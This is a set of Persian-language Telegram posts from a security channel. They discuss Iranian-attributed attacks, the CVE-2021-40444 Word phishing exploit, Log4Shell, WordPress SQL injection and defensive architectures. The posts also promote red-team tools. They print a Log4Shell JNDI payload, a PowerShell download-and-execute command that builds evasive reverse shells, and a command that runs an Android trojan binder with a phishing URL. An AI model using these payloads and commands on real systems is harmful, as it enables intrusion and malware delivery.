#Exploit Public-Facing Application
به لطف تحقیقات عمومی شده محقق معروف یعنی Orange Tsai کشور ما در عرصه حملات سایبری توانسته خودنمایی خوبی از خود نشان بدهد

موضوعی که دلیل وجودی کنفرانس ها و حمایت های تحقیقاتی که در همه جای دنیا شرکت های خصوصی و دستگاه های حاکمیتی در بحث علوم امنیت سایبر انجام میدهند، منظور دقیق تر این است که زمانی که شما پتانسیل تحقیقاتی کشور رو فعال نکنید همواره نیروی انسانی رو راهی کشور های خارجی کرده و یک قدم حتی در حوزه حملات سایبری از دنیا عقب خواهید بود

اما در خصوص حملات اخیر ایران: گفته شده از ابزار SharpWMI که مبتنی بر زبان #C و با استفاده از Functionality های WMI کار میکند مورد استفاده بوده و در بحث ایجاد Persistence از تکنیک T1053.005 که مبتنی بر XML است بهره گرفته شده

از دیگر موارد میتوان به اهداف حمله در پلن Impact اشاره کرد که رویکرد ایران نصب باج افزاری با نام BlackMatter بوده که قرار به رمز کردن فایل های حساس رو داشته

مورد بعد استفاده از پروتکل FTP بصورت Over Alternative Protocol بر روی درگاه 443 بوده که سعی بر شناسایی نشدن بوده.

https://t.me/Unk9vvN/1997
@Unk9vvN
#Powershortshell Stealer for #Iranian
در روزهای گذشته یک حمله به برخی ارگان های داخل کشور اتفاق افتاده مبتنی بر آسیب پذیری CVE-2021-40444 که یک آسیب پذیری از نوع فایل فرمت Word هستش و از قرار معلوم موفق هم بوده

مهاجمین طبق معمول با استفاده از Spear Phishing Mail شروع به پخش ایمیل جعلی کردند که یک فایل word بهش Attachment شده بود، و جالبه که با استفاده از Internal Recon سیستم عامل قربانی ها مامور بر گرفتن دسترسی از مخاطبان فارسی زبان گرفته، یعنی فقط ایرانی ها هدف قرار گرفتند

محتوای ایمیل مشخصه که محتوای تحریکات سیاسی داره، اما در مورد ابعاد فنی میبایست گفت که مراحل Initial مربوط به Exploit به این صورت بوده که اول یک document ساخته میشه یک Bitmap Image اضافه میشه بعد doc بسته شده و Unzip میشه و فایل document.xml.rels بهش یک دامنه و فایل External معرفی میشه

در ادامه فایل document.xml باید به OLEObject اضافه شده که مبتنی بر اون COM Object مربوط به DLL ها یعنی rundll32.exe فراخوان خواهد شد و جالبه که از cpl برای اجرای فرمت inf استفاده شده که یک جبر مربوط به خود آسیب پذیری بوده.

@Unk9vvN
#Log4Shell #Zero_Day Exploit #Log4j Java Library
به تازگی آسیب پذیری کشف شده از نوع روز صفر که میتونه به مهاجم قدرت اجرای کد از راه دور رو بده، این آسیب پذیری با شناسه CVE-2021-44228 برای کتابخانه Apache log4j هستش که بسیاری از سرویس های ابری مانند Apple iCloud و Steam پیدا شده و میتوانسته مورد بهره برداری قرار بگیره، از نسخه 2.0 تا 2.14.1 این آسیب پذیری وجود داره و در نسخه 2.15.0 رفع شده.

https://t.me/Unk9vvN/1309

اما این آسیب پذیری مبتنی بر پروتکل HTTP و TCP میتونه به endpoint آسیب پذیر ارسال بشه و بهره برداری صورت بگیره، این آسیب پذیری در کتابخانه ای رخ داده که مامور Log مقادیر User Agent است و مهاجم میتونه پیلود خودش رو مبتنی بر پارامتر User Agent ارسال کرده و با wrapper پروتکل jndi دسترسی به ldap گرفته و ارتباطی رو مبتنی بر درگاهی ایجاد کنه.

Payload Example:

${jndi:ldap://127.0.0.1:1389/a}



https://github.com/tangxiaofeng7/apache-log4j-poc
https://issues.apache.org/jira/browse/LOG4J2-2109
@Unk9vvN
#Android Trojan Binder
اولین پروژه عمومی تیم تحقیقاتی Unk9 در سال 1397 آغاز شد که متمرکز بر حملات به سیستم عامل اندروید بود و در کنار استفاده از روش های مبهم سازی در خصوص Bind پیلود Metasploit عمل میکرد و از تکنیک های دیگری مانند Certificate Spoofing هم بهره میبرد.

از دیگر ویژگی های آن ابزار این بود که مکانیزم Request Permission سیستم عامل اندروید رو که از نسخه API 21 که در اندروید 6 به بعد استفاده شد رو دور میزد، از موارد دیگه میشه به پایدار نگهداشتن پل ارتباطی خط فرمان بود که مکانیزم SELinux قالبا اقدام به بستن دسترسی TCP میکرد، داشت

از موارد دیگه میشه به استفاده از دو روش Hook اشاره کرد که Activity پیلود مربوطه رو به دو طریق فعال میکرد و باعث برقراری ارتباط میشد، بحث ساخت PostEXP بصورت اتوماتیک بود که وقتی دسترسی برقرار میشد، فعال شده و جمع آوری اطلاعات رو انجام میداد، همچنین بحث Persistence هم پوشش داده شده بود.

موارد مربوط به مهندسی اجتماعی حذف شده است.

┌──(unk9vvn㉿avi)-[~]
└─$ sudo chmod +x AndTroj.sh;sudo ./AndTroj.sh $NoIP $Original-APK $Phishing-URL


https://github.com/a9v8i/andtroj
@Unk9vvN
#C2_Matrix Labs
آزمایشگاهی در خصوص شبیه سازی ابزارهای Command and Control یا C2 ساخته شده که میتونه به ما کمک شایانی در خصوص شناخت پتانسیل خط فرمان های مختلف بده و همچنین نحوه کار کرد این خط فرمان ها.

تقریبا میتوان گفت تمامی خط فرمان های معروف متن باز در دنیا پوشش داده شده و این میتونه ما رو در خصوص فهم چگونگی برقرار ارتباط آنها با بدافزار یا جاوسوس افزار های خود را چطور انجام میدهند.

همچنین طریقه کشف و شکار این ارتباطات میتونه انجام بشه و از ابزار هایی مانند Wireshark و Sysmon استفاده میشود، این آزمایشگاه میتونه به شکارچیان تهدید و جرم شناسان کمک شایانی بکنه.

https://howto.thec2matrix.com
@Unk9vvN
This media is not supported in your browser
VIEW IN TELEGRAM
#Powershell HTTP/S Reverse Shell
یه ابزار بسیار خوب در بحث ساخت RAT های مختلف مبتنی بر فایل فرمت های رایج که در تصویر مشخصه.

این ابزار در خصوص شبیه سازی عملیات تیم قرمز میتونه یک گزینه خوبی باشه که در مقابل مکانیم های IDS و IPS و AV تونسته ناشناس یا Evasion باشه، برای ساخت پیلود میتونید از فرمان زیر بصورت مستقیم استفاده کنید...

powershell -ep bypass "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"


https://github.com/3v4Si0N/HTTP-revshell
@Unk9vvN
#Cybersecurity #Reference #Architecture
مایکروسافت در ورکشاپ CISO یا مدیر امنیت اطلاعات سعی داشته که در پنج مرحله تمامی ساختار های امنیت سایبری را در خصوص یک سازمان یا شرکت تجاری تشریح کند،

از این روی مباحثی مانند SOC و و SIEM و SOAR را مبتنی بر Graph Security API برقراره کرده و تمامی Infrastructure خودش رو مبتنی بر Azure Security Center بقرار میکند،

در تمامی ابعاد مکانیزم های امنیتی قرار دارند و مبتنی بر دستگاه مربوطه خود مامور رهگیری های امنیتی هستند، مثلا در قسمت Extranet مواردی مانند Edge DLP و SSL Proxy و IPS/IDS و NGFW توانسطه عملیات شناسایی تهدید رو در لبه شبکه قرار کنه،

از موارد دیگه استفاده از Microsoft Defender ATP هستش که مامور پایش Endpoint Security بوده و از محصولاتی Office 365 سعی بر برقرار امنیت داره، مواردی مانند Azure WAF و DDoS Mitigation هم مکمل های لایه Application هستش که توانسته اند پازل امنیتی رو کامل کنند،

خلاصه که یک آرایش کاملی از برقراری امنیت ارائه شده که بد نیست مبنای خدمات دفاعی در کشور بشه، البته مبتنی بر محصولات بومی یا Trust خارجی...

https://aka.ms/MCRA
@Unk9vvN
#Obfuscation (#RAR with #JPG ext) #RedTeam
یکی از روش هایی که همواره در عملیات های تیم قرمز در سالهای آتی مورد توجه بود تکنیک استفاده از Extension Spoofing بواسطه کاراکتر Letf-to-Right و همچنین استفاده از فایل فرمت SFX که مبتنی بر نرم افزار WinRAR به نوعی عملیات Section Compression رو در فایل فرمت خودش انجام میداد و به روش Stub Decompression مقادیر کمپر شده خودش رو آزاد میکرد، و در کنار این آزاد کردن مواردی رو هم خودش اجرا میکرد مانند: run as administrator یا Extract کردن داده های کمپرس شده در آدرس مشخص شده و همچنین اجرای اون فایل ها...

اما در سال 2018 که تیم تحقیقاتی Unk9vvN دمویی از این تکنیک رو نمایی کرد، همزمان با این رو نمایی یک APT 39 منتسب به ایران هم رخ داد که از همین تکنیک فوق استفاده شده بود، همچنین این تکنیک همونطور که در تصویر دوم مشاهده میشه آن زمان پتانسیل دور زدن EDR و NIDS و AV ها رو داشته و کاملا عملیاتی بوده، البته امروز دیگر این تکنیک لو رفته و کار آمد نیست، برای مشاهده بخشی از این تکنیک میتونید به دمو تولید شده در سال 2019 مراجعه نمایید...

@Unk9vvN
#DTS #Solution
در تصاویر پست راهکارهای امنیتی یکی از شرکت های خارجی رو مشاهده میکنید که در پنج مرحله آرایش راهکار امنیتی خودش رو تشریح کرده،

اولین مورد Cyber Strategy هستش که مشخص میشه مبتنی بر نیازمندی های یک سازمان و مجموعه چه نوعی از استراتژی رو میبایست شرکت امنیتی در نظر بگیره، معمولا در این مورد متغیر های زیادی وجود نداره.

دومین مورد Cyber Secure هستش که اشاره میشه به سه دسته Red Team که خدمات تهاجمی رو پیاده سازی میکند، دوم Blue Team که خدمات تدافعی رو پشتیبانی خواهد کرد و سوم White Team که نقش مشاوره ای دارد، در تصویر مشخصه که هر کدام چه نقش ها و موضوعاتی رو شامل میشن و این حلقه با هم یک ساختار ایمن رو برقرار خواهند کرد،

اما در مرحله Defense in Depth میبینیم که 8 بخش مطرحه که در لایه ها و Scope های مختلف محصولات و سرویس های دفاعی و خدمات، طرح ریزی شده و در کنار هم زنجره امنیت دفاعی رو پوشش خواهند داد، بدلیل محدودیت نوشتاری در پست های تلگرام از توضیح تک به تک صرف نظر میکنم،

اما در مورد قسمت Cyber Kill Chain آرایش دفاعی در مقابل APT رو هم تشریح کرده است.

https://www.dts-solution.com/
@Unk9vvN
#Atomic #Threat #Coverage
ابزار Atomic Threat Coverage یک ابزار در راستای اجرای اتوماتیک رفتار های تهدید آمیز مبتنی بر MITRE ATT&CK که میتواند سیستم عامل را تحت تاثیر قرار دهد و همزمان با این شبیه سازی که برپایه ابزار Atomic Red Team انجام میشود،

بحث شناسایی و تشخیص تکنیک های شبیه سازی شده هم مبتنی بر ابزار Sigma که یک سیستم Signature Based هستش پیاده سازی میشود،

این ابزار به نوعی میتوان گفت به عنوان یک Purple Teaming عمل کرده و وظایف یک Red Teamer و یک Blue Teamer رو بصورت همزمان و مبتنی بر ابزار های متن باز پیاده سازی و عملیاتی میکند،

از ابزار atc-react در راستای Incident Response یا پاسخ به حادثه استفاده میکند و با استفاده از Visualisations یک داشبورد Threat Hunting رو برای ما به نمایش خواهد گذاشت.

https://github.com/atc-project/atomic-threat-coverage
@Unk9vvN
#China #Research #Vulnerabilites
یکی از پایگاه های قوی تحقیقات پیشرفته آسیب پذیری های حوزه امنیت تهاجمی، وبسایت exp-blog.com که مرتبط با Computer Emergency Readiness Team کشور چین که با دامنه cert.360.cn فعال است.

همچنین این وبسایت exp-blog.com یک مخزن به اشتراک گزاری آسیب پذیری های عمومی شده دارند که در راستای سیاست های Cyber Threat Intelligence تعریف میشود، که در گیت هاب این وبسایت قابل دسترس هستش.

این مرجع برای متخصصین امنیت دفاعی میتونه یک منبع بررسی Signature آسیب پذیری های باینری و تحت وب باشه...

https://github.com/lyy289065406/threat-broadcast
@Unk9vvN
#SQLi in #Wordpress Core #CVE_2022_21661
هجده ساعت پیش یک آسیب پذیری SQL Injection یا تزریق کد SQL، برای هسته سیستم مدیریت محتوای Wordpress عمومی شد که در نسخه 5.8.2 قابلیت بهره برداری داشته و در نسخه جدید یعنی 5.8.3 وصله یا اصطلاحا Patch شده.

آسیب پذیری از اونجایی منشا میگیره که تابع clean_queryget_sql_for_clause زمانی که میخواد یک Append در خصوص ورودی Query خود انجام دهد، یکبار مقدار terms خود را به تابع clean_query پاس میدهد که وظیفه این تابع تصدیق میشود که مقدار terms در term_taxonomy_id قرار دارد یا خیر،

در ادامه مقدار پارامتر field در شرطی مقایسه میشه با مقدار متغییر resulting_field$ که اینجا شرط مربوطه آسیب پذیر هستش به Type Juggling که یک آسیب پذیری مبنی بر دور زدن نتیجه یک شرط است،

اما در ادامه مقدار پارامتر terms بصورت آرایه خوانده و در آرایه

$query['terms']

پارس داده میشود که عملا تزریق کد SQL در همینجا و در اثر نبود فیلترینگ صحیح ورودی پارامتر، رخ خواهد داد.

https://wordpress.org/news/2022/01/wordpress-5-8-3-security-release/
@Unk9vvN